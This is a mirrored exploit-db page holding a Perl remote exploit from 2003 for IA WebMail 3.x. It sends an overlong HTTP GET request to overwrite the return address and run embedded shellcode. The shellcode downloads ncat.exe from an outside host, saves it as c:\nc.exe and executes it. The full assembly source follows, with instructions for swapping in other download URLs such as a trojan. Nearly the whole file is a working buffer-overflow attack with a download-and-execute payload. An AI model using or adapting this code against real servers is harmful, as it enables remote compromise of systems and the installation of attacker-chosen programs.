bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/124.pl
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

237 lines
No EOL
6.2 KiB
Perl
Executable file
Raw Permalink Blame History

#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
# Application Specific Shellcode: URL Downloader
# - www elitehaven net/ncat.exe (downloaded)
# - c:\nc.exe (created)
#
# By Peter Winter-Smith peter4020 hotmail com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
# - Windows XP Home SP1
# - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
# - WebMailsvr.exe exits without consuming 100% resources in most
# cases.
# - This has only been tested with IA WebMail 3.1, however it was
# designed to exploit all versions.
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: iawebmail.pl <victim> <port>\n\n";
exit;
}
$shellcode = "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
"\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
"\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
"\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
"\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
"\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
"\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
"\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
"\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
"\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
"\xFF\x36\x50\xFF\x15\x14\x52\x02" .
"\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
"\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
"\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
"\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
"\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
"\x15\x14\x52\x02\x10\x5A\x52\x31" .
"\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
"\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
"\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
"\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
"\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
"\x46\x69\x6C\x65\x41\xFF\x57\x69" .
"\x6E\x45\x78\x65\x63\xFF\x68\x74" .
"\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
"\x2E\x65\x6C\x69\x74\x65\x68\x61" .
"\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
"\x6E\x63\x61\x74\x2E\x65\x78\x65" .
"\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
"\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
"\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";
print $victim $exploit;
print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";
sleep(5);
print "Done.\n";
close($victim);
exit;
########################################
## SHELLCODE #
########################################
# ; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [peter4020@hotmail.com]
# ;
# ; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
#
# int3
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [100251DCh] ; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [10025214h] ; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16] ; file path
# push dword [esi]
# lea esi, [edx-12] ; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [100251DCh] ; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi] ; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [10025214h] ; GetProcAddress(kernel32.dll, WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16] ; file path
# push dword [esi]
#
# call eax
#
# int3
#
#
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ; db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ; push edi ; 'http://www.elitehaven.net/ncat.exe'
# ; lea edi, [edi+35]
# ; and make it:
# ; push edi ; 'http://www.site.com/someguy/trojan.exe'
# ; lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#####################################################################
# milw0rm.com [2003-11-19]
Reference in a new issue View git blame Copy permalink